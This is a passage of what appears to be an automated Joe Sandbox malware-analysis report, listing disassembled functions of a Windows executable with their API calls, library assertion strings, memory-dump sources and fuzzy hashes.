                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$AcquireRelease
                                                  • String ID:
                                                  • API String ID: 17069307-0
                                                  • Opcode ID: 51ebcb2faa42a29da2447e09117dba36900247cdcbed93f39a90f6cf8ee5ac52
                                                  • Instruction ID: 2a6728ea65e821b57f4279bc62b63c4533b40ccd777f77af2b48220720262e57
                                                  • Opcode Fuzzy Hash: 51ebcb2faa42a29da2447e09117dba36900247cdcbed93f39a90f6cf8ee5ac52
                                                  • Instruction Fuzzy Hash: 6E321171A402568FDB24CF68C884BBABBF1FF44314F198169E8499B396D735EC41CBA1
                                                  Function 00D69460 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5da3d1f117ae40ec549a6b65fa814b7a33b83584ced32ea16e4b6f03a9073312
                                                  • Instruction ID: 0b87eb3b70176baa7762af293b63f7c4a6498f90da196b932d506eafc34fed20
                                                  • Opcode Fuzzy Hash: 5da3d1f117ae40ec549a6b65fa814b7a33b83584ced32ea16e4b6f03a9073312
                                                  • Instruction Fuzzy Hash: 6E023B71E012199BDF14CFA9C9906AEFBF5FF49314F28826AD519E7380D731A905CBA0
                                                  Function 00D80015 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D800B0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D8012B
                                                  • FindClose.KERNEL32(00000000), ref: 00D8014D
                                                  • FindClose.KERNEL32(00000000), ref: 00D80170
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 134b22bcdd1761693e88e0a70f1653025feec582adc34030e24ac309b4314a24
                                                  • Instruction ID: df5184383b69d3658f7173953f8048a5e71c9a43e62e98b69b5abbfb2e6cb3c3
                                                  • Opcode Fuzzy Hash: 134b22bcdd1761693e88e0a70f1653025feec582adc34030e24ac309b4314a24
                                                  • Instruction Fuzzy Hash: 7F41C471A00619EEDB60FF64CC8DEBABB79EF85325F188195E405D7141EB309E888B70
                                                  Function 00D61E74 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D61E80
                                                  • IsDebuggerPresent.KERNEL32 ref: 00D61F4C
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D61F6C
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00D61F76
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 9e2a871952c25cc28e531093460687904dc8c3f6592ca3222a87e890a40dfe2e
                                                  • Instruction ID: d977d8d9ae30445aae11162ac5857a6c1726df93a0f2b993db9fda9195b4157c
                                                  • Opcode Fuzzy Hash: 9e2a871952c25cc28e531093460687904dc8c3f6592ca3222a87e890a40dfe2e
                                                  • Instruction Fuzzy Hash: D9311A75D45318DBDB10DF64D9897CDBBB8AF08300F14419AE409A7260EBB19A85CF64
                                                  Function 00D253D0 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetVersionExW.KERNEL32(0000011C), ref: 00D2540D
                                                  • GetProductInfo.KERNEL32(?,?,00000000,00000000,00000000), ref: 00D25434
                                                  • __Init_thread_header.LIBCMT ref: 00D25493
                                                  • GetNativeSystemInfo.KERNEL32(00DC5B88), ref: 00D254C4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Info$Init_thread_headerNativeProductSystemVersion
                                                  • String ID:
                                                  • API String ID: 2164803554-0
                                                  • Opcode ID: 1c7fa916cc98e462c945b9085616bbe9428896e002130421286c00a6e92cdd11
                                                  • Instruction ID: a6796154ce27f705efd756ebeee6c810e03c41ee653e3c207eab2ae30077515e
                                                  • Opcode Fuzzy Hash: 1c7fa916cc98e462c945b9085616bbe9428896e002130421286c00a6e92cdd11
                                                  • Instruction Fuzzy Hash: 99212F72A0070AAFD7209B10FC46FEA7B71EB58714F2402A9F60996290D7B17DD4CBB0
                                                  Function 00D2F850 Relevance: 5.6, Strings: 4, Instructions: 564COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$__n < size()$vector[] index out of bounds
                                                  • API String ID: 0-797005249
                                                  • Opcode ID: ef9b908461697254bc3a0f227d15ce890f987c9fffb2767898f15a0631785736
                                                  • Instruction ID: e1deb685f626f8eef885c2a16df570e6743106ab04e5358c6fed378fea1723e5
                                                  • Opcode Fuzzy Hash: ef9b908461697254bc3a0f227d15ce890f987c9fffb2767898f15a0631785736
                                                  • Instruction Fuzzy Hash: 02129A71A003159FCB14DF68D894A6EB7F1EF98314F098A3DE9569B391DB31A804CBA1
                                                  Function 00D457E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D45870
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D45975
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: MZx
                                                  • API String ID: 1678258262-2575928145
                                                  • Opcode ID: 1744565301b2b6dcaae9f437845056a040437f7d0706dd3ad49e36ead44ced03
                                                  • Instruction ID: 8393eca840db28cff7a0929b9e30cfdc7f522624ff67c0b5740e24ff7d068866
                                                  • Opcode Fuzzy Hash: 1744565301b2b6dcaae9f437845056a040437f7d0706dd3ad49e36ead44ced03
                                                  • Instruction Fuzzy Hash: AF51B672E04A09DBDB14CF58E8406ADB7B6EF84720F5C8129E455E730ADB31ED51CBA1
                                                  Function 00CECFA7 Relevance: 5.3, Strings: 4, Instructions: 310COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • __s2 < __s1 || __s2 >= __s1+__n, xrefs: 00CED1F8
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 00CED202
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00CED207
                                                  • char_traits::copy overlapped range, xrefs: 00CED1F3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$__s2 < __s1 || __s2 >= __s1+__n$char_traits::copy overlapped range
                                                  • API String ID: 0-2841209950
                                                  • Opcode ID: 91a02f5b55cf61b51290e23028f3aaaafed3afce902920b0207692d03db7103d
                                                  • Instruction ID: 86b24ecf2e5a88d7647e55680a20601c78be8c48f41ba876a17548e95a6c54ee
                                                  • Opcode Fuzzy Hash: 91a02f5b55cf61b51290e23028f3aaaafed3afce902920b0207692d03db7103d
                                                  • Instruction Fuzzy Hash: 26C125B1D003989FDB11DFA4D881AEEBBB1FF55310F088169F449A7351D730AA85CBA1
                                                  Function 00D62381 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00D62392
                                                  • GetSystemInfo.KERNEL32(?), ref: 00D623AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: InfoQuerySystemVirtual
                                                  • String ID: D
                                                  • API String ID: 401686933-2746444292
                                                  • Opcode ID: 91823ec38458e9871d2f3db1e175778c797faadd8dc11b1f4594aed9a492fff1
                                                  • Instruction ID: c11dc0dbcf6d4a822b7279fcf68e0b1e62a923fb3742757109ccbda15b5c9413
                                                  • Opcode Fuzzy Hash: 91823ec38458e9871d2f3db1e175778c797faadd8dc11b1f4594aed9a492fff1
                                                  • Instruction Fuzzy Hash: 2701F732600509ABCB14DE29DC05BFE7BA9AFC4334F0CC225ED59D7354D778D8058690
                                                  Function 00D527B0 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D527BF
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D52943
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID:
                                                  • API String ID: 1678258262-0
                                                  • Opcode ID: 9a91ec3fca25c68bba79c91447d44532a78691cebe14b26599b9e2e07e5fbe03
                                                  • Instruction ID: fdcb12ca7513515f7c3ab12df842119f4f1ed257e8649b125984c8704fbe2dd4
                                                  • Opcode Fuzzy Hash: 9a91ec3fca25c68bba79c91447d44532a78691cebe14b26599b9e2e07e5fbe03
                                                  • Instruction Fuzzy Hash: 4061B131B002059BCF189F68D885A7E7BA6EB85322B188529EC46DB351D730ED49CFF1
                                                  Function 00D7F670 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7F6C4
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7F70E
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7F7D4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale$ErrorLast
                                                  • String ID:
                                                  • API String ID: 661929714-0
                                                  • Opcode ID: a4d3f90af1c8089f6258a90ee8cda48ca842cfc9cacc7ee7299cde27f123e06b
                                                  • Instruction ID: 1143bd362a6cdfcb8b19f628cc322c178bba008edd892e745883021fb6407bca
                                                  • Opcode Fuzzy Hash: a4d3f90af1c8089f6258a90ee8cda48ca842cfc9cacc7ee7299cde27f123e06b
                                                  • Instruction Fuzzy Hash: BC614DB25102179BDB399F28CC82BBA77A8EF04311F1881BAE909C6585F774D991CB71
                                                  Function 00D7C4B6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D7C5AE
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D7C5B8
                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00D7C5C5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 5b0fb87d955dbd7a744aae33cecda62129ea979e7e78a7ac9948445df3b66551
                                                  • Instruction ID: 3d9060c1a1dbe7816e925c846d20b28e7de1b750f4ece3a61595c95edee736b2
                                                  • Opcode Fuzzy Hash: 5b0fb87d955dbd7a744aae33cecda62129ea979e7e78a7ac9948445df3b66551
                                                  • Instruction Fuzzy Hash: 9431B375911218EBCB21DF64DD89B8DBBB4BF08310F5082DAE40DA6260E7709F858F64
                                                  Function 00CEFB40 Relevance: 4.5, APIs: 3, Instructions: 39encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32 ref: 00CEFB6D
                                                  • CryptGenRandom.ADVAPI32(?,?,?), ref: 00CEFB80
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CEFB8F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 5bcd659ff2748661ecccb499b437f423d610b43160d0a6cdeb49a6a501be490f
                                                  • Instruction ID: d1bc8e6d05d276e13f10ca07e7073461e9687531761339f15d8a5d794e52255d
                                                  • Opcode Fuzzy Hash: 5bcd659ff2748661ecccb499b437f423d610b43160d0a6cdeb49a6a501be490f
                                                  • Instruction Fuzzy Hash: 0AF0A931900308EFCB00AFB5DC09A8D7FB1BF04320F40826AE819E62A1EF719A549B61
                                                  Function 00D45F10 Relevance: 3.9, Strings: 3, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
